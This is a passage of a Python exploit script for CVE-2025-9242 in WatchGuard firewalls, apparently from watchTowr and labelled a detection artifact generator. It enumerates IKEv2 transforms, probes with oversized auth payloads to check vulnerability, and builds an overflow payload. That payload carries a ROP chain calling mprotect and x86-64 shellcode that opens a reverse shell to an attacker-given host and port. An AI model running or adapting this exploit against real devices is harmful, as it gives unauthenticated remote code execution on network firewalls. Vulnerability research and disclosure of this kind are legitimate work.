except UnicodeDecodeError:
logging.debug(f'[#] Unicode decode error while decoding {watchguard_data}')
continue
except binascii.Error:
logging.debug(f'[#] Base64 decode error while decoding {vendor[32:].decode('ascii')}')
continue
# Check for errors
notifications = r.get(PayloadType.NOTIFY)
for notification in notifications:
if notification.message_type == NotifyType.NO_PROPOSAL_CHOSEN:
raise IkeNoProposalChosenException()
if notification.message_type == NotifyType.INVALID_KE_PAYLOAD:
raise IkeInvalidKEPayloadException()
# Only get crypto when using default transforms
if default_transforms is None:
# Get responder nonce and server public key from response
responder_nonce = r.get(PayloadType.NONCE)
server_public_key_bytes = r.get(PayloadType.KEY_EXCHANGE)
if len(responder_nonce) != 1:
raise IkeMissingNonceException()
if len(server_public_key_bytes) != 1:
raise IkeMissingKeyExchangeException()
# Perform key exchange
self.crypto.key_exchange(responder_spi, responder_nonce[0], server_public_key_bytes[0][4:]) # Skip 4-byte header
# Print keys for Wireshark
logger.debug(f'\n=== Wireshark ikev2_decryption_table ===')
logger.debug(f'* Initiator\'s SPI: {self.crypto.initiator_spi:016x}')
logger.debug(f'* Responder\'s SPI: {self.crypto.responder_spi:016x}')
logger.debug(f'* SK_ei: {self.crypto.SK_ei.hex()}')
logger.debug(f'* SK_er: {self.crypto.SK_er.hex()}')
logger.debug(f'* Encryption algorithm: "AES-CBC-256 [RFC3602]"')
logger.debug(f'* SK_ai: {self.crypto.SK_ai.hex()}')
logger.debug(f'* SK_ar: {self.crypto.SK_ar.hex()}')
logger.debug(f'* Integrity algorithm: "HMAC_SHA2_256_128 [RFC4868]"')
logger.debug(f'========================\n')
return r
def auth(self, identification_initiator=b'WatchGuard'):
return self.send_encrypted(ExchangeType.IKE_AUTH, 1, (
IkePacker.identification_initiator(PayloadType.CERTIFICATE, 2, identification_initiator) +
IkePacker.certificate(PayloadType.NOTIFY, 4, bytes.fromhex('308202d330820279a003020102020401000013300a06082a8648ce3d040302304b310b3009060355040613024445310f300d0603550408130642617965726e310c300a060355040a13034e4350311d301b060355040313144e43502044656d6f2043412045434320323035303022180f32303136303830343038303031335a180f32303530303830353038303031335a3074310b3009060355040613024445311a3018060355040a0c1144656d6f204f7267616e697a6174696f6e3110300e060355040b0c0744656d6f204f553110300e06035504030c07436c69656e74313125302306092a864886f70d0109011616636c69656e74314064656d6f2e6e63702d652e636f6d3059301306072a8648ce3d020106082a8648ce3d03010703420004b74572a1b5dd1c4cafdab7f06a92913cab7ee2a55106efa4056e2dc17369600510553454e37e69e9a08c5abae5a05a77e01ebb04e4b272fe349f12a34088ceeaa382011c3082011830090603551d1304023000300b0603551d0f0404030205a0301d0603551d250416301406082b0601050507030206082b06010505070307301d0603551d0e041604145a5e6aa29f89959131c17018ef64dc2a8a4a4a6a30750603551d23046e306c801425db6d44dec7a03eb5f8623ab18784546a0f0409a14fa44d304b310b3009060355040613024445310f300d0603550408130642617965726e310c300a060355040a13034e4350311d301b060355040313144e43502044656d6f204341204543432032303530820302000230490603551d1104423040a026060a2b060104018237140203a0180c16436c69656e74314064656d6f2e6e63702d652e636f6d8116436c69656e74314064656d6f2e6e63702d652e636f6d300a06082a8648ce3d04030203480030450220602d766db7e07b70d88e3810acc6cd350ccdda1e60d77bd36ed6e60f869ef371022100d1e3d278fcacf41cd8380691363ad3933d6bc293fae9c847ddf6187bb0f06f49')) +
IkePacker.notify(PayloadType.NOTIFY, NotifyType.INITIAL_CONTACT) +
IkePacker.notify(PayloadType.CERTIFICATE_REQUEST, NotifyType.HTTP_CERT_LOOKUP_SUPPORTED) +
IkePacker.certificate_request(PayloadType.CONFIGURATION, 4, []) +
IkePacker.configuration(PayloadType.SECURITY_ASSOCIATION, 1, [
IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP4_ADDRESS),
IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP4_NETMASK),
IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP4_DNS),
IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP4_MBNS),
IkePacker.configuration_attribute(20002),
IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP6_ADDRESS),
IkePacker.configuration_attribute(9),
IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP6_DNS ),
IkePacker.configuration_attribute(25),
IkePacker.configuration_attribute(ConfigurationAttribute.APPLICATION_VERSION),
IkePacker.configuration_attribute(28672),
IkePacker.configuration_attribute(28673),
IkePacker.configuration_attribute(28674),
IkePacker.configuration_attribute(20006),
IkePacker.configuration_attribute(20007),
IkePacker.configuration_attribute(28675),
IkePacker.configuration_attribute(28676),
IkePacker.configuration_attribute(28677),
IkePacker.configuration_attribute(28678),
IkePacker.configuration_attribute(28679),
IkePacker.configuration_attribute(28680),
IkePacker.configuration_attribute(28681),
IkePacker.configuration_attribute(20003),
IkePacker.configuration_attribute(20004),
IkePacker.configuration_attribute(28682),
IkePacker.configuration_attribute(20005, b'debian'),
IkePacker.configuration_attribute(28682, b'debian'),
]) +
IkePacker.security_association(PayloadType.TRAFFIC_SELECTOR_INITIATOR, IkePacker.proposal(PayloadType.NONE, 1, 3, [
IkeTransform(PayloadType.TRANSFORM, TransformType.ENCRYPTION_ALGORITHM, EncryptionAlgorithm.ENCR_AES_CBC.value, 0x800e0100),
IkeTransform(PayloadType.TRANSFORM, TransformType.PSEUDO_RANDOM_FUNCTION, PseudoRandomFunction.PRF_HMAC_SHA2_256.value),
IkeTransform(PayloadType.TRANSFORM, TransformType.INTEGRITY_ALGORITHM, IntegrityAlgorithm.AUTH_HMAC_SHA2_256_128.value),
IkeTransform(PayloadType.NONE, TransformType.DIFFIE_HELLMAN_GROUP, DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP.value),
], spi=b'\xc1\xa9\x65\x6b')) +
IkePacker.traffic_selector(PayloadType.TRAFFIC_SELECTOR_RESPONDER, [
IkePacker.traffic_selector_ipv4_address_range(0, 65535, '0.0.0.0', '255.255.255.255'),
]) +
IkePacker.traffic_selector(PayloadType.VENDOR_ID, [
IkePacker.traffic_selector_ipv4_address_range(0, 65535, '0.0.0.0', '255.255.225.255'),
]) +
IkePacker.vendor_id(PayloadType.NOTIFY, bytes.fromhex('afcad71368a1f1c96b8696fc77570100')) +
IkePacker.notify(PayloadType.NOTIFY, NotifyType.MOBIKE_SUPPORTED, protocol_id = 0) +
IkePacker.notify(PayloadType.NONE, NotifyType.MULTIPLE_AUTH_SUPPORTED, protocol_id = 0)
))
class IkeTransformGroup:
def __init__(self):
self.encryption_algorithm = None
self.pseudo_random_function = None
self.integrity_algorithm = None
self.diffie_hellman_group = None
class RunnerStatus(enum.IntEnum):
SUCCESS = 0
TIMEOUT = 1
NO_PROPOSAL_CHOSEN = 2
SA_INIT_FAILED = 3
class Runner:
@staticmethod
def check_default_transform(ike):
logging.info(f'[#] Sending IKEv2 SA Init with default transform')
ike.reset()
try:
ike.sa_init()
except TimeoutError:
logging.debug(f'[#] Timeout')
return RunnerStatus.TIMEOUT
except IkeNoProposalChosenException:
logging.debug(f'[#] No proposal chosen')
return RunnerStatus.NO_PROPOSAL_CHOSEN
finally:
ike.close()
return RunnerStatus.SUCCESS
@staticmethod
def enumerate_transforms(ike):
# See: https://www.iana.org/assignments/ikev2-parameters/ikev2-parameters.xhtml
encryptions = {
'ENCR_DES_IV64': {'id': 1},
'ENCR_DES': {'id': 2},
'ENCR_3DES': {'id': 3},
'ENCR_RC5': {'id': 4},
'ENCR_IDEA': {'id': 5},
'ENCR_CAST': {'id': 6},
'ENCR_BLOWFISH': {'id': 7},
'ENCR_3IDEA': {'id': 8},
'ENCR_DES_IV32': {'id': 9},
'RESERVED': {'id': 10},
'ENCR_NULL': {'id': 11},
'ENCR_AES_CBC': {
'id': 12,
'attributes': [
0x800e0080, # Format: Type/Value (0x80), Type: Key Length (0x0e), Key Length: 128 (0x0080)
0x800e00c0, # Format: Type/Value (0x80), Type: Key Length (0x0e), Key Length: 192 (0x00c0)
0x800e0100, # Format: Type/Value (0x80), Type: Key Length (0x0e), Key Length: 256 (0x0100)
],
},
'ENCR_AES_CTR': {'id': 13},
'ENCR_AES_CCM_8': {'id': 14},
'ENCR_AES_CCM_12': {'id': 15},
'ENCR_AES_CCM_16': {'id': 16},
'ENCR_AES_GCM_8': {'id': 18},
'ENCR_AES_GCM_12': {'id': 19},
'ENCR_AES_GCM_16': {'id': 20},
'ENCR_NULL_AUTH_AES_GMAC': {'id': 21},
'P1619_XTS_AES': {'id': 22},
'ENCR_CAMELLIA_CBC': {'id': 23},
'ENCR_CAMELLIA_CTR': {'id': 24},
'ENCR_CAMELLIA_CCM_8': {'id': 25},
'ENCR_CAMELLIA_CCM_12': {'id': 26},
'ENCR_CAMELLIA_CCM_16': {'id': 27},
'ENCR_CHACHA20_POLY1305': {'id': 28},
'ENCR_AES_CCM_8_IIV': {'id': 29},
'ENCR_AES_GCM_16_IIV': {'id': 30},
'ENCR_CHACHA20_POLY1305_IIV': {'id': 31},
'ENCR_KUZNYECHIK_MGM_KTREE': {'id': 32},
'ENCR_MAGMA_MGM_KTREE': {'id': 33},
'ENCR_KUZNYECHIK_MGM_MAC_KTREE': {'id': 34},
'ENCR_MAGMA_MGM_MAC_KTREE': {'id': 35},
}
pseudo_random_functions = {
'PRF_HMAC_MD5': 1,
'PRF_HMAC_SHA1': 2,
'PRF_HMAC_TIGER': 3,
'PRF_AES128_XCBC': 4,
'PRF_HMAC_SHA2_256': 5,
'PRF_HMAC_SHA2_384': 6,
'PRF_HMAC_SHA2_512': 7,
'PRF_AES128_CMAC': 8,
'PRF_HMAC_STREEBOG_512': 9,
}
integrity_algorithms = {
'AUTH_HMAC_MD5_96': 1,
'AUTH_HMAC_SHA1_96': 2,
'AUTH_DES_MAC': 3,
'AUTH_KPDK_MD5': 4,
'AUTH_AES_XCBC_96': 5,
'AUTH_HMAC_MD5_128': 6,
'AUTH_HMAC_SHA1_160': 7,
'AUTH_AES_CMAC_96': 8,
'AUTH_AES_128_GMAC': 9,
'AUTH_AES_192_GMAC': 10,
'AUTH_AES_256_GMAC': 11,
'AUTH_HMAC_SHA2_256_128': 12,
'AUTH_HMAC_SHA2_384_192': 13,
'AUTH_HMAC_SHA2_512_256': 14,
}
key_exchange_methods = {
'DH_GROUP_2048_BIT_MODP': 14,
'DH_GROUP_768_BIT_MODP': 1,
'DH_GROUP_1024_BIT_MODP': 2,
'DH_GROUP_1536_BIT_MODP': 5,
'DH_GROUP_3072_BIT_MODP': 15,
'DH_GROUP_4096_BIT_MODP': 16,
'DH_GROUP_6144_BIT_MODP': 17,
'DH_GROUP_8192_BIT_MODP': 18,
'RANDOM_ECP_GROUP_256_BIT': 19,
'RANDOM_ECP_GROUP_384_BIT': 20,
'RANDOM_ECP_GROUP_521_BIT': 21,
'DH_GROUP_1024_BIT_MODP_WITH_160_BIT_PRIME_ORDER_SUBGROUP': 22,
'DH_GROUP_2048_BIT_MODP_WITH_224_BIT_PRIME_ORDER_SUBGROUP': 23,
'DH_GROUP_2048_BIT_MODP_WITH_256_BIT_PRIME_ORDER_SUBGROUP': 24,
'RANDOM_ECP_GROUP_192_BIT': 25,
'RANDOM_ECP_GROUP_224_BIT': 26,
'BRAINPOOLP224R1': 27,
'BRAINPOOLP256R1': 28,
'BRAINPOOLP384R1': 29,
'BRAINPOOLP512R1': 30,
'CURVE25519': 31,
'CURVE448': 32,
'GOST3410_2012_256': 33,
'GOST3410_2012_512': 34,
'ML_KEM_512': 35,
'ML_KEM_768': 36,
'ML_KEM_1024': 37,
}
transforms = []
# Append encryptions
for enc in encryptions:
if 'attributes' in encryptions[enc] and encryptions[enc]['attributes'] is not None:
for attr in encryptions[enc]['attributes']:
transforms.append(IkeTransform(PayloadType.TRANSFORM, TransformType.ENCRYPTION_ALGORITHM, encryptions[enc]['id'], attr))
else:
transforms.append(IkeTransform(PayloadType.TRANSFORM, TransformType.ENCRYPTION_ALGORITHM, encryptions[enc]['id'], None))
# Append pseudo-random functions
for psr in pseudo_random_functions:
transforms.append(IkeTransform(PayloadType.TRANSFORM, TransformType.PSEUDO_RANDOM_FUNCTION, pseudo_random_functions[psr]))
# Append integrity algorithms
for integ in integrity_algorithms:
transforms.append(IkeTransform(PayloadType.TRANSFORM, TransformType.INTEGRITY_ALGORITHM, integrity_algorithms[integ]))
# Loop each key exchange methods
supported_transforms = []
service_found = False
for kem in key_exchange_methods:
# Retry on timeouts up to 2 times
for i in range(2):
ike.reset()
try:
logging.debug(f'[#] Sending IKEv2 SA Init with Diffie Hellman Group: {DiffieHellmanGroup(key_exchange_methods[kem]).name} ({key_exchange_methods[kem]})')
r = ike.sa_init(transforms + [IkeTransform(PayloadType.NONE, TransformType.DIFFIE_HELLMAN_GROUP, key_exchange_methods[kem])])
sa = r.get(PayloadType.SECURITY_ASSOCIATION)
if len(sa) != 1:
service_found = True
break
# Append supported transform to list
service_found = True
supported_transform = IkeTransformGroup()
for transform in sa[0].proposal.transforms:
logging.debug(f'[#] Found supported transform: {str(transform)}')
if transform.transform_type == TransformType.ENCRYPTION_ALGORITHM:
supported_transform.encryption_algorithm = transform
elif transform.transform_type == TransformType.PSEUDO_RANDOM_FUNCTION:
supported_transform.pseudo_random_function = transform
elif transform.transform_type == TransformType.INTEGRITY_ALGORITHM:
supported_transform.integrity_algorithm = transform
elif transform.transform_type == TransformType.DIFFIE_HELLMAN_GROUP:
supported_transform.diffie_hellman_group = transform
supported_transforms.append(supported_transform)
break
except IkeNoProposalChosenException:
logging.debug(f'[#] No proposal chosen')
service_found = True
break
except IkeInvalidKEPayloadException:
logging.debug(f'[#] Invalid KE payload')
service_found = True
# Invalid KE payload occurs when the diffie hellman group is supported but the key exchange payload sent is invalid
supported_transform = IkeTransformGroup()
supported_transform.diffie_hellman_group = IkeTransform(TransformType.DIFFIE_HELLMAN_GROUP, 0, key_exchange_methods[kem], None)
supported_transforms.append(supported_transform)
break
except TimeoutError:
logging.debug(f'[#] Timeout')
continue
finally:
ike.close()
return service_found, supported_transforms
@staticmethod
def trigger(ike, payload):
# Send SA Init up to 5 times
success = False
for i in range(5):
ike.reset()
try:
logging.debug(f'[#] Trigger verification length ({len(payload)}) -> Sending SA Init')
ike.sa_init()
except TimeoutError:
# Unexpected timeout, try again
logging.debug(f'[#] Trigger verification length ({len(payload)}) -> Sending SA Init -> Timeout')
ike.close()
continue
# SA Init succeeded as expected, send auth packet
success = True
break
# SA Init failed multiple times
if not success:
logging.error('[-] SA Init failed multiple times, has the service crashed?')
return RunnerStatus.SA_INIT_FAILED
try:
logging.debug(f'[#] Sending IKE_AUTH payload')
ike.auth(payload)
except TimeoutError:
logging.debug(f'[#] Sending IKE_AUTH payload -> Timeout')
return RunnerStatus.TIMEOUT
finally:
ike.close()
logging.debug(f'[#] Sending IKE_AUTH payload -> Received response')
return RunnerStatus.SUCCESS
class Exploit:
@staticmethod
def build(version, ip, port):
wg = WatchGuardFw(version)
logging.info(f'[#] Building shellcode payload...')
# sockaddr_in (sin_family: AF_INET [0x2], sin_port, sin_addr, sin_zero [0x0])
data = struct.pack('<H', 0x02) + struct.pack('!H', port) + socket.inet_aton(ip) + (b'\x00' * 8) # 0x00 - serv_addr
data += b"/usr/bin/python3" # 0x10
data += b"\x00\x00\x00\x00\x00\x00\x00\x00" # 0x20
data += b"-i\x00\x00-u\x00\x00" # 0x28 (-i), 0x2c (-u)
data += b"\x00" * (wg.get_i('offset_shellcode') - len(data))
shellcode = b""
# r13 = &shellcode - 0x10 (data)
shellcode += b"\xe8\x00\x00\x00\x00\x41\x5d" # call 0; pop r13
shellcode += b"\x49\x83\xed" + struct.pack('<B', wg.get_i('offset_shellcode') + 5) # sub r13, offset_shellcode+5 (5 for call instruction)
# int sockfd = socket[41](AF_INET [0x2], SOCK_STREAM [0x1], IPPROTO_TCP [0x6]);
shellcode += b"\x6a\x02\x5f" # push 0x2; pop rdi
shellcode += b"\x6a\x01\x5e" # push 0x1; pop rsi
shellcode += b"\x6a\x06\x5a" # push 0x6; pop rdx
shellcode += b"\x6a\x29\x58" # push 41; pop rax
shellcode += b"\x0f\x05" # syscall(41)
# connect[42](sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
shellcode += b"\x49\x89\xc6" # mov r14, rax
shellcode += b"\x4c\x89\xf7" # mov rdi, r14
shellcode += b"\x4c\x89\xee" # mov rsi, r13
shellcode += b"\x6a\x10\x5a" # push 0x10; pop rdx
shellcode += b"\x6a\x2a\x58" # push 42; pop rax
shellcode += b"\x0f\x05" # syscall(42)
# dup2[33](sockfd, 0);
shellcode += b"\x4c\x89\xf7" # mov rdi, r14
shellcode += b"\x6a\x00\x5e" # push 0x0; pop rsi
shellcode += b"\x6a\x21\x58" # push 33; pop rax
shellcode += b"\x0f\x05" # syscall(33)
# dup2[33](sockfd, 1);
shellcode += b"\x4c\x89\xf7" # mov rdi, r14
shellcode += b"\x6a\x01\x5e" # push 0x1; pop rsi
shellcode += b"\x6a\x21\x58" # push 33; pop rax
shellcode += b"\x0f\x05" # syscall(33)
# dup2[33](sockfd, 2);
shellcode += b"\x4c\x89\xf7" # mov rdi, r14
shellcode += b"\x6a\x02\x5e" # push 0x2; pop rsi
shellcode += b"\x6a\x21\x58" # push 33; pop rax
shellcode += b"\x0f\x05" # syscall(33)
# char *argv[] = { "/usr/bin/python3", "-i", "-u", NULL };
# execve[59]("/usr/bin/python3", argv, NULL);
shellcode += b"\x4c\x89\xef" # mov rdi, r13
shellcode += b"\x48\x83\xc7\x10" # add rdi, 0x10 (rdi = "/usr/bin/python3\x00")
shellcode += b"\x48\x89\xe6" # mov rsi, rsp (rsi = argv)
shellcode += b"\x48\x83\xee\x20" # sub rsi, 0x20 (0x20 for 4 argv pointers)
shellcode += b"\x4c\x89\xe8" # mov rax, r13
shellcode += b"\x48\x83\xc0\x20" # add rax, 0x20
shellcode += b"\x50" # push rax (argv[3] = NULL)
shellcode += b"\x48\x83\xc0\x08" # add rax, 0x8
shellcode += b"\x50" # push rax (argv[2] = "-i\x00")
shellcode += b"\x48\x83\xc0\x04" # add rax, 0x4
shellcode += b"\x50" # push rax (argv[1] = "-u\x00")
shellcode += b"\x48\x83\xe8\x1c" # sub rax, 0x1c
shellcode += b"\x50" # push rax (argv[0] = "/usr/bin/python3\x00")
shellcode += b"\x6a\x00\x5a" # push 0x0; pop rdx
shellcode += b"\x6a\x3b\x58" # push 59; pop rax
shellcode += b"\x0f\x05" # syscall(59)
# Validate data length does not exceed offset_shellcode
if len(data) != wg.get_i('offset_shellcode'):
logging.error(f'[-] Data length must be {wg.get_i("offset_shellcode")}')
return None
buffer = b''
buffer += data
buffer += shellcode
buffer += b'C' * (520 - len(buffer))
logging.info(f'[#] Building ROP chain...')
rop_chain = (
# rbp = rsp
wg.get('pop_rcx_ret') + # rcx = pop r13; ret
wg.get('pop_r13_ret') + #
wg.get('mov_rax_rcx_ret') + # rax = rcx
wg.get('mov_rbp_rsp_call_rax') + # rbp = rsp; call rax (return address is in r13)
# rax = rbp
wg.get('mov_rax_rbp_pop_rbx_pop_rbp_ret') + # rax = rbp
struct.pack('<Q', 0x0) + # rbx = 0
struct.pack('<Q', 0x0) + # rbp = 0
# rax -= (offset_stack_page_aligned)
wg.get('pop_rcx_ret') + # rcx = (offset_stack_page_aligned)
struct.pack('<Q', (wg.get_i('offset_stack_page_aligned'))) +
wg.get('sub_rax_rcx_ret') + # rax -= rcx
# rbx = rax
wg.get('push_rax_mov_rax_rbx_pop_rbx_ret') + #
# rdi = rbx (stack buffer page aligned)
wg.get('pop_rcx_ret') + # rcx = pop r13; ret
wg.get('pop_r13_ret') + #
wg.get('mov_rax_rcx_ret') + # rax = rcx
wg.get('mov_rdi_rbx_call_rax') + # rdi = rbx; call rax (return address is in r13)
# rsi = 0x2000
wg.get('pop_rsi_ret') + # rsi = 0x2000; ret
struct.pack('<Q', 0x2000) +
# rdx = PROT_READ|PROT_WRITE|PROT_EXEC (0x7)
wg.get('pop_rdx_ret') + # rdx = 0x7; ret
struct.pack('<Q', 0x7) +
# rax = got_bind
wg.get('pop_rcx_ret') + # rcx = got_bind; ret
wg.get('got_bind') +
wg.get('mov_rax_rcx_ret') + # rax = rcx
# rax = bind
wg.get('mov_rax_rax_ret') + # rax = bind
# rax -= offset_bind_mprotect
wg.get('pop_rcx_ret') + # rcx = offset_bind_mprotect
wg.get('offset_bind_mprotect') +
wg.get('sub_rax_rcx_ret') + # rax -= rcx
# mprotect(rdi: stack buffer page aligned, rsi: 0x2000, edx: PROT_READ|PROT_WRITE|PROT_EXEC)
wg.get('jmp_rax') +
# rbp = rsp
wg.get('pop_rcx_ret') + # rcx = pop r13; ret
wg.get('pop_r13_ret') + #
wg.get('mov_rax_rcx_ret') + # rax = rcx
wg.get('mov_rbp_rsp_call_rax') + # rbp = rsp; call rax (return address is in r13)
# rax = rbp
wg.get('mov_rax_rbp_pop_rbx_pop_rbp_ret') + # rax = rbp
struct.pack('<Q', 0x0) + # rbx = 0
struct.pack('<Q', 0x0) + # rbp = 0
# rax -= (offset_stack-offset_shellcode)
wg.get('pop_rcx_ret') + # rcx = (offset_stack-offset_shellcode)
struct.pack('<Q', (wg.get_i('offset_stack')-wg.get_i('offset_shellcode'))) +
wg.get('sub_rax_rcx_ret') + # rax -= rcx
# rbx = rax
wg.get('push_rax_mov_rax_rbx_pop_rbx_ret') + #
# call shellcode
wg.get('jmp_rbx')
)
return (
buffer + # buffer
b'B' * 8 + #
b'C' * 8 + #
b'D' * 8 + # RBX
b'E' * 8 + # R12
b'F' * 8 + # R13
b'G' * 8 + # R14
b'H' * 8 + # R15
b'I' * 8 + # RBP
rop_chain # RIP
)
def main(args):
banner = """ __ ___ ___________
__ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________
\\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\
\\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/
\\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__|
\\/ \\/ \\/
watchTowr-vs-WatchGuard-CVE-2025-9242.py
(*) WatchGuard Unauthenticated Remote Code Execution Detection Artifact Generator
- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-9242]
"""
print(banner)
# Setup logging
logging.basicConfig(level=logging.DEBUG if args.verbose else logging.INFO, format='%(message)s')
# Setup IKE client
ike = Ike(args.rhost, args.rport, args.timeout)
# Step 1: Check if IKEv2 transform ENCR_AES_CBC_256, PRF_HMAC_SHA2_256, AUTH_HMAC_SHA2_256_128, 2048 bit MODP group is supported
default_status = Runner.check_default_transform(ike)
if default_status != RunnerStatus.SUCCESS:
# Skip enumerating transforms if requested
if args.skip_enumerate:
if default_status == RunnerStatus.NO_PROPOSAL_CHOSEN:
logging.warning("[!] IKEv2 service found but default IKEv2 transform not supported")
return
logging.error("[-] No IKEv2 service found")
return
# Step 2: Enumerate IKEv2 Transforms
logging.info('[#] Enumerating IKEv2 transforms...')
service_found, supported_transforms = Runner.enumerate_transforms(ike)
if not service_found:
logging.error("[!] No IKEv2 service found")
return
if len(supported_transforms) == 0:
logging.warning("[!] IKEv2 service found but no IKEv2 transforms supported")
return
# Print supported transforms
logging.warning("[!] Default transform not supported")
logging.info("[+] Supported IKEv2 transforms:\n")
logging.info(f'|---------------------------|---------------------------|---------------------------|---------------------------|')
logging.info(f'| Encryption Algorithm | Pseudo Random Function | Integrity Algorithm | Diffie Hellman Group |')
logging.info(f'|---------------------------|---------------------------|---------------------------|---------------------------|')
for transform in supported_transforms:
logging.info(f'| {str(transform.encryption_algorithm).ljust(25)} | {str(transform.pseudo_random_function).ljust(25)} | {str(transform.integrity_algorithm).ljust(25)} | {str(transform.diffie_hellman_group).ljust(25)} |')
logging.info(f'|---------------------------|---------------------------|---------------------------|---------------------------|')
return
# Step 3: Trigger verification
logging.info("[+] Default IKEv2 service found")
if not args.soft_verify:
logging.info(f'[#] Verifying if IKEv2 service is vulnerable...')
# Send a valid auth packet to ensure the service is running as expected
trigger_status = Runner.trigger(ike, b'A' * 512)
if trigger_status == RunnerStatus.SA_INIT_FAILED:
return
elif trigger_status == RunnerStatus.TIMEOUT:
logging.error("[-] IKEv2 timed out responding to valid auth packet, has the service crashed?")
return
# Send an invalid auth packet, if the service responds then it is vulnerable
trigger_status = Runner.trigger(ike, b'A' * 513)
if trigger_status == RunnerStatus.SA_INIT_FAILED:
return
elif trigger_status == RunnerStatus.TIMEOUT:
logging.info("[-] IKEv2 service is patched against CVE-2025-9242")
else:
logging.info("[+] IKEv2 service is vulnerable to CVE-2025-9242")
# Check the service is running as expected
trigger_status = Runner.trigger(ike, b'A' * 512)
if trigger_status == RunnerStatus.SA_INIT_FAILED:
return
elif trigger_status == RunnerStatus.TIMEOUT:
logging.error("[-] IKEv2 timed out responding to valid auth packet, has the service crashed?")
return
# Step 4: Trigger exploit
if not args.exploit:
return
if args.lhost is None:
logging.error("[-] Local host parameter is required to exploit")
return
if FW_VERSION == None and args.fw_version is None:
logging.error("[-] Failed to determine WatchGuard firmware version")
return
target_fw_version = args.fw_version
if target_fw_version == None:
target_fw_version = FW_VERSION
if not WatchGuardFw.has(target_fw_version):
logging.error(f"[-] Unsupported WatchGuard firmware version: {target_fw_version}")
return
payload = Exploit.build(target_fw_version, args.lhost, args.lport)
logging.info(f'[#] Sending exploit payload to {args.lhost}:{args.lport}')
Runner.trigger(ike, payload)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="WatchGuard CVE-2025-9242 Detection Artifact Generator")
parser.add_argument("-rh", "--rhost", required=True, help="Remote host")
parser.add_argument("-rp", "--rport", type=int, default=500, help="Remote port (default: 500)")
parser.add_argument("-t", "--timeout", type=int, default=10, help="Timeout in seconds (default: 10)")
parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output")
parser.add_argument("-sv", "--soft-verify", action="store_true", help="Only verify based on version without verifying with auth packet")
parser.add_argument("-se", "--skip-enumerate", action="store_true", help="Skip enumerating transforms")
parser.add_argument("-e", "--exploit", action="store_true", help="Exploit the vulnerability")
parser.add_argument("-lh", "--lhost", help="Local host")
parser.add_argument("-lp", "--lport", type=int, default=31337, help="Local port (default: 31337)")
parser.add_argument("-fw", "--fw-version", help="WatchGuard firmware version (eg: 12.11.3)")
main(parser.parse_args())